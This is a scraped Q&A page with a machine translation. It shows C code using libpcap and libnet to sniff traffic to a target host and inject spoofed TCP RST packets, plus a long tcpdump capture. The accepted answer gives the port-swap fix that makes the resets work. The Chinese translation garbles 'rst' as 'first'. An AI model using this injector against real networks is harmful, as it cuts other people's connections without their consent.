堆栈内存溢出
  简体   繁体   English

使用 libnet 发送的 Rst 数据包不会重置连接

[英]Rst packets sent with libnet do not reset the connection

 原文  2020-03-16 15:51:11       c/ linux/ gcc/ libpcap/ libnet

问题描述

I am trying to do 'rst hijacking' by using ac script with libcap and libnet included.我试图通过使用包含 libcap 和 libnet 的 ac 脚本来进行“第一次劫持”。 I use libcap to sniff all packets coming from and going to a host given as input to the program via the commandline.我使用 libcap 来嗅探来自和去往主机的所有数据包,这些数据包通过命令行作为程序的输入提供。 Then libnet sends rst packets to the host trying to connect to the specified host.然后 libnet 将第一个数据包发送到尝试连接到指定主机的主机。 However when I run the script and connect to the given host via ssh I can do this without the connection being reset.但是,当我运行脚本并通过 ssh 连接到给定主机时,我可以在不重置连接的情况下执行此操作。 I am using Kali Linux 2019.4 64 bit version.我使用的是 Kali Linux 2019.4 64 位版本。 This is the code:这是代码:

#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);

int main(int argc, char *argv[]) {
  struct pcap_pkthdr cap_header;
  const u_char *packet, *pkt_data;
  pcap_t *pcap_handle;
  char errbuf[PCAP_ERRBUF_SIZE];
  char *device;
  u_long target_ip;
  libnet_t *l;  /* libnet context */

  if (argc < 1) {
    printf("Usage: %s <target IP>\n", argv[0]);
    exit(0);
  }
  target_ip = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE);

  if (target_ip == -1)
    fatal("Invalid target address");

  device = pcap_lookupdev(errbuf);
  if (device == NULL)
    fatal(errbuf);

  pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
  if (pcap_handle == NULL)
    fatal(errbuf);
  l = libnet_init(LIBNET_RAW4, NULL, errbuf);
  if (l == NULL)
    fatal(errbuf);

  libnet_seed_prand(l);

  set_packet_filter(pcap_handle, (struct in_addr*)&target_ip);

  printf("Resetting all TCP connections to %s on %s\n", argv[1], device);
  pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&l);

  pcap_close(pcap_handle);
  libnet_destroy(l);
  return 0;
}

int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
  struct bpf_program filter;
  char filter_string[100];

  sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip));

  printf("[DEBUG]: filter string is \'%s\'\n", filter_string);
  if (pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
    fatal("pcap_compile failed");

  if (pcap_setfilter(pcap_hdl, &filter) == -1)
    fatal("pcap_setfilter failed");
}

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
  u_char *pkt_data;
  struct libnet_tcp_hdr *TCPhdr;
  struct libnet_ipv4_hdr *IPhdr;
  struct data_pass *passed;
  libnet_t **l_passed;
  int bcount;

  l_passed = (libnet_t **)user_args;

  TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H);
  IPhdr = (struct libnet_ipv4_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);

  printf("Reseting TCP connection from %s:%d ", inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));
  printf("<---> %s:%d\n", inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));

  if (libnet_build_tcp(htons(TCPhdr->th_dport),
    htons(TCPhdr->th_sport),
    htonl(TCPhdr->th_ack),
    libnet_get_prand(LIBNET_PRu32),
    TH_RST,
    libnet_get_prand(LIBNET_PRu16),
    0,
    0,
    LIBNET_TCP_H,
    NULL,
    0,
    *l_passed,
    0) == -1) {
      fatal("in building tcp header");
    }
  if (libnet_build_ipv4(LIBNET_TCP_H+LIBNET_IPV4_H,
    IPTOS_LOWDELAY,
    libnet_get_prand(LIBNET_PRu16),
    0,
    libnet_get_prand(LIBNET_PR8),
    IPPROTO_TCP,
    0,
    *((u_long *)&(IPhdr->ip_src)),
    *((u_long *)&(IPhdr->ip_dst)),
    NULL,
    0,
    *l_passed,
    0) == -1) {
      fatal("in building ip header");
    }

    bcount = libnet_write(*l_passed);
    if (bcount < LIBNET_IPV4_H+LIBNET_TCP_H)
      printf("Warning: incomplete package written. (%d of %d bytes)\n", bcount, LIBNET_IPV4_H+LIBNET_TCP_H);

    libnet_clear_packet(*l_passed);

    usleep(5000);
}

When I run it like this I:当我像这样运行它时:

sudo ./rst_hijack 192.168.74.37

and meanwhile connect to 19.168.74.37 via ssh the output tells me that it is resetting the connection but I still can use the terminal in the ssh connection as usual.同时通过 ssh 连接到 19.168.74.37 输出告诉我它正在重置连接,但我仍然可以像往常一样在 ssh 连接中使用终端。 Now my question is what is causing the behavior of this program and how to fix it to properly reset the connection?现在我的问题是是什么导致了该程序的行为以及如何修复它以正确重置连接? Here is the output of running:这是运行的输出:

sudo tcpdump "dst host 192.168.74.37 || dst host 192.168.74.65" -i eth0 -nl

listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
08:44:52.624717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [S], seq 4267262989, win 64240, options [mss 1460,sackOK,TS val 1038758058 ecr 0,nop,wscale 7], length 0
08:44:52.639135 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1138266852, win 502, options [nop,nop,TS val 1038758073 ecr 120128956], length 0
08:44:52.640092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 59375, length 0
08:44:52.640118 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 0:32, ack 1, win 502, options [nop,nop,TS val 1038758074 ecr 120128956], length 32
08:44:52.648338 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 19838, length 0
08:44:52.670975 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 44, win 502, options [nop,nop,TS val 1038758105 ecr 120128988], length 0
08:44:52.672025 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266895, win 18065, length 0
08:44:52.673352 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 32:1424, ack 44, win 502, options [nop,nop,TS val 1038758107 ecr 120128988], length 1392
08:44:52.676762 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1124, win 501, options [nop,nop,TS val 1038758110 ecr 120128993], length 0
08:44:52.680200 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266895, win 11726, length 0
08:44:52.685387 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138267975, win 19899, length 0
08:44:52.722855 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1424:1472, ack 1124, win 501, options [nop,nop,TS val 1038758156 ecr 120129039], length 48
08:44:52.728049 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138267975, win 11027, length 0
08:44:52.757195 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1576, win 501, options [nop,nop,TS val 1038758191 ecr 120129074], length 0
08:44:52.760160 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 63708, length 0
08:44:52.761581 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1472:1488, ack 1576, win 501, options [nop,nop,TS val 1038758195 ecr 120129074], length 16
08:44:52.768033 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 55326, length 0
08:44:52.812954 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1488:1532, ack 1576, win 501, options [nop,nop,TS val 1038758247 ecr 120129129], length 44
08:44:52.814950 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1620, win 501, options [nop,nop,TS val 1038758249 ecr 120129132], length 0
08:44:52.815093 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1532:1592, ack 1620, win 501, options [nop,nop,TS val 1038758249 ecr 120129132], length 60
08:44:52.816056 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 31111, length 0
08:44:52.821239 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268471, win 29341, length 0
08:44:52.824528 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1672, win 501, options [nop,nop,TS val 1038758258 ecr 120129140], length 0
08:44:52.826428 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268471, win 26394, length 0
08:44:52.832086 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268523, win 8500, length 0
08:44:57.864004 ARP, Request who-has 192.168.74.37 tell 192.168.74.69, length 28
08:44:59.170523 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1592:1676, ack 1672, win 501, options [nop,nop,TS val 1038764604 ecr 120129140], length 84
08:44:59.176106 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268523, win 57729, length 0
08:44:59.275774 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1700, win 501, options [nop,nop,TS val 1038764709 ecr 120135590], length 0
08:44:59.276091 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1676:1788, ack 1700, win 501, options [nop,nop,TS val 1038764710 ecr 120135590], length 112
08:44:59.280071 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268551, win 15752, length 0
08:44:59.285284 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268551, win 57521, length 0
08:44:59.808013 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2200, win 501, options [nop,nop,TS val 1038765242 ecr 120136080], length 0
08:44:59.809815 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2244, win 501, options [nop,nop,TS val 1038765243 ecr 120136126], length 0
08:44:59.810123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1788:2240, ack 2244, win 501, options [nop,nop,TS val 1038765244 ecr 120136126], length 452
08:44:59.816095 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269051, win 40356, length 0
08:44:59.821297 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269095, win 16013, length 0
08:44:59.826499 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269095, win 44708, length 0
08:44:59.826731 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2352, win 501, options [nop,nop,TS val 1038765260 ecr 120136140], length 0
08:44:59.826807 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2468, win 501, options [nop,nop,TS val 1038765260 ecr 120136141], length 0
08:44:59.826975 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2856, win 501, options [nop,nop,TS val 1038765261 ecr 120136141], length 0
08:44:59.832084 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269203, win 21728, length 0
08:44:59.837289 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269319, win 57265, length 0
08:44:59.842548 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269707, win 20477, length 0
08:45:00.107292 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2964, win 501, options [nop,nop,TS val 1038765541 ecr 120136422], length 0
08:45:00.112102 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269815, win 45488, length 0
08:45:00.980228 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2240:2276, ack 2964, win 501, options [nop,nop,TS val 1038766414 ecr 120136422], length 36
08:45:00.982783 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3000, win 501, options [nop,nop,TS val 1038766416 ecr 120137299], length 0
08:45:00.984104 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269815, win 22888, length 0
08:45:00.989328 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269851, win 3332, length 0
08:45:01.060943 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2276:2312, ack 3000, win 501, options [nop,nop,TS val 1038766495 ecr 120137299], length 36
08:45:01.064097 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269851, win 31536, length 0
08:45:01.070127 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3036, win 501, options [nop,nop,TS val 1038766504 ecr 120137387], length 0
08:45:01.072099 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269887, win 58974, length 0
08:45:01.174452 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2312:2348, ack 3036, win 501, options [nop,nop,TS val 1038766608 ecr 120137387], length 36
08:45:01.176088 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269887, win 10923, length 0
08:45:01.176423 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3072, win 501, options [nop,nop,TS val 1038766610 ecr 120137493], length 0
08:45:01.184092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269923, win 36096, length 0
08:45:01.219113 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2348:2384, ack 3072, win 501, options [nop,nop,TS val 1038766653 ecr 120137493], length 36
08:45:01.223478 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3108, win 501, options [nop,nop,TS val 1038766657 ecr 120137539], length 0
08:45:01.224013 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269923, win 53739, length 0
08:45:01.229150 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269959, win 44679, length 0
08:45:01.453120 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2384:2420, ack 3108, win 501, options [nop,nop,TS val 1038766887 ecr 120137539], length 36
08:45:01.456107 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269959, win 17777, length 0
08:45:01.456393 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3144, win 501, options [nop,nop,TS val 1038766890 ecr 120137772], length 0
08:45:01.464089 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269995, win 9542, length 0
08:45:01.775818 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2420:2456, ack 3144, win 501, options [nop,nop,TS val 1038767209 ecr 120137772], length 36
08:45:01.776102 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269995, win 31138, length 0
08:45:01.777681 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3180, win 501, options [nop,nop,TS val 1038767211 ecr 120138094], length 0
08:45:01.784090 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270031, win 473, length 0
08:45:01.807123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2456:2492, ack 3180, win 501, options [nop,nop,TS val 1038767241 ecr 120138094], length 36
08:45:01.808007 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270031, win 62491, length 0
08:45:01.809600 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3216, win 501, options [nop,nop,TS val 1038767243 ecr 120138126], length 0
08:45:01.816235 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270067, win 58091, length 0
08:45:01.929904 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2492:2528, ack 3216, win 501, options [nop,nop,TS val 1038767364 ecr 120138126], length 36
08:45:01.931774 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3252, win 501, options [nop,nop,TS val 1038767365 ecr 120138248], length 0
08:45:01.936106 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270067, win 7117, length 0
08:45:01.939199 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2528:2564, ack 3252, win 501, options [nop,nop,TS val 1038767373 ecr 120138248], length 36
08:45:01.941365 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270103, win 63243, length 0
08:45:01.941455 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3288, win 501, options [nop,nop,TS val 1038767375 ecr 120138258], length 0
08:45:01.946686 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270103, win 12199, length 0
08:45:01.951897 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270139, win 56953, length 0
08:45:02.079717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2564:2600, ack 3288, win 501, options [nop,nop,TS val 1038767513 ecr 120138258], length 36
08:45:02.080174 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270139, win 51134, length 0
08:45:02.081735 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3324, win 501, options [nop,nop,TS val 1038767515 ecr 120138398], length 0
08:45:02.088089 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270175, win 51600, length 0
08:45:02.217181 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2600:2636, ack 3324, win 501, options [nop,nop,TS val 1038767651 ecr 120138398], length 36
08:45:02.219087 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3360, win 501, options [nop,nop,TS val 1038767653 ecr 120138536], length 0
08:45:02.224100 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270175, win 8177, length 0
08:45:02.229315 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270211, win 12145, length 0
08:45:02.261653 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2636:2672, ack 3360, win 501, options [nop,nop,TS val 1038767695 ecr 120138536], length 36
08:45:02.263689 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3396, win 501, options [nop,nop,TS val 1038767697 ecr 120138580], length 0
08:45:02.263998 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270211, win 25986, length 0
08:45:02.269112 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270247, win 48796, length 0
08:45:02.270102 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2672:2708, ack 3396, win 501, options [nop,nop,TS val 1038767704 ecr 120138580], length 36
08:45:02.274243 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3432, win 501, options [nop,nop,TS val 1038767708 ecr 120138591], length 0
08:45:02.274263 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270247, win 47387, length 0
08:45:02.280269 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270283, win 54522, length 0
08:45:02.432123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2708:2744, ack 3432, win 501, options [nop,nop,TS val 1038767866 ecr 120138591], length 36
08:45:02.435146 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3468, win 501, options [nop,nop,TS val 1038767869 ecr 120138751], length 0
08:45:02.440109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270283, win 30791, length 0
08:45:02.445333 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 31531, length 0
08:45:02.649095 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2744:2780, ack 3468, win 501, options [nop,nop,TS val 1038768083 ecr 120138751], length 36
08:45:02.656101 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 35180, length 0
08:45:02.669801 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2780:2816, ack 3468, win 501, options [nop,nop,TS val 1038768103 ecr 120138751], length 36
08:45:02.672049 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 56114, length 0
08:45:02.676520 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3468, win 501, options [nop,nop,TS val 1038768110 ecr 120138751,nop,nop,sack 1 {3504:3540}], length 0
08:45:02.680109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 50643, length 0
08:45:02.902946 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3540, win 501, options [nop,nop,TS val 1038768337 ecr 120139219], length 0
08:45:02.904054 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270391, win 33161, length 0
08:45:03.261163 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2816:2852, ack 3540, win 501, options [nop,nop,TS val 1038768695 ecr 120139219], length 36
08:45:03.264017 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270391, win 24146, length 0
08:45:03.264404 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3576, win 501, options [nop,nop,TS val 1038768698 ecr 120139581], length 0
08:45:03.269455 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3660, win 501, options [nop,nop,TS val 1038768703 ecr 120139585], length 0
08:45:03.270931 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3768, win 501, options [nop,nop,TS val 1038768705 ecr 120139588], length 0
08:45:03.272009 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270427, win 61053, length 0
08:45:03.277137 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270511, win 27067, length 0
08:45:03.282302 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270619, win 37574, length 0
08:45:03.748917 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2852:2888, ack 3768, win 501, options [nop,nop,TS val 1038769183 ecr 120139588], length 36
08:45:03.751160 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3804, win 501, options [nop,nop,TS val 1038769185 ecr 120140068], length 0
08:45:03.752077 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270619, win 58993, length 0
08:45:03.757298 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 62372, length 0
08:45:03.919971 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2888:2924, ack 3804, win 501, options [nop,nop,TS val 1038769354 ecr 120140068], length 36
08:45:03.928109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 29405, length 0
08:45:04.132019 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2888:2924, ack 3804, win 501, options [nop,nop,TS val 1038769566 ecr 120140068], length 36
08:45:04.136107 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 54770, length 0
08:45:04.362957 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3840, win 501, options [nop,nop,TS val 1038769797 ecr 120140679], length 0
08:45:04.368104 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270691, win 26246, length 0

1 个解决方案

解决方案1
 0 已采纳  2020-03-16 15:58:08

The port numbers of the rst-packets are the wrong.第一个数据包的端口号是错误的。

This line这条线

08:44:52.624717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [S], seq 4267262989, win 64240, options [mss 1460,sackOK,TS val 1038758058 ecr 0,nop,wscale 7], length 0

shows, that the connection is established from 192.168.74.69 port 35340 to the ssh server running on 192.168.74.37 port 22显示,连接是从 192.168.74.69 端口 35340 建立到在 192.168.74.37 端口 22 上运行的 ssh 服务器

but this rst packet但是这个第一个包

08:44:52.640092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 59375, length 0

resets a connection from host 192.168.74.69 port 22, to host 192.168.74.37 port 35340重置从主机 192.168.74.69 端口 22 到主机 192.168.74.37 端口 35340 的连接

You have to swap the port numbers (or the ip numbers, depending on if you send the packet to the server or to the client) in the rst packet.您必须交换第一个数据包中的端口号(或 IP 号,取决于您是将数据包发送到服务器还是客户端)。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 libnet发送RST数据包 - libnet sending RST packets libnet无法写入ip数据包 - libnet fails to write ip packets 使用 libpcap 和 libnet 解码 ICMPv4 数据包 - Decoding ICMPv4 packets with libpcap and libnet 可以使用libnet注入TCP数据包/数据包篡改吗? - Can libnet be used to inject tcp packets/packet mangling? HTTP客户端从某些服务器获得“对等连接重置”(TCP RST),但其他服务器未获得 - HTTP Client getting “Connection reset by peer” (TCP RST) from some servers but not others 为什么客户端无法解析libnet构建和发送的http数据包? - Why client cannot parse the http packet built and sent by libnet? TCP连接-延迟的close()和RST - TCP connection - delayed close() and RST 删除打开的TCP连接而不发送RST - Drop an open TCP connection without sending RST libpcap是否监视发送的数据包? - Does libpcap watch sent packets? 客户端被杀死或崩溃时内核发送的TCP RST - TCP RST sent by kernel when client is killed or crashed
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM